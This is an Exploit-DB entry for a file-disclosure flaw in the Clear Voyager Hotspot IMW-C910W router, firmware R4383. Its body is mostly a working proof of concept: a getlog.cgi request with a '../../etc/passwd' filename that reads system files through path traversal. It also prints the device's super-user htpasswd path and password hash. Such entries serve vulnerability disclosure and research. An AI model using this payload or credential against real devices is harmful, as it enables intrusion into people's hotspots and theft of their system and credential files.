Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure
Author: Damaster
type: webapps
platform: cgi
port: 80.0
date_added: 2016-07-15
date_updated: 2016-07-15
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comIMW-C910W_V2234_R4383A.bin
- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-
- vulnerable Device Software Version : R4383
-
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================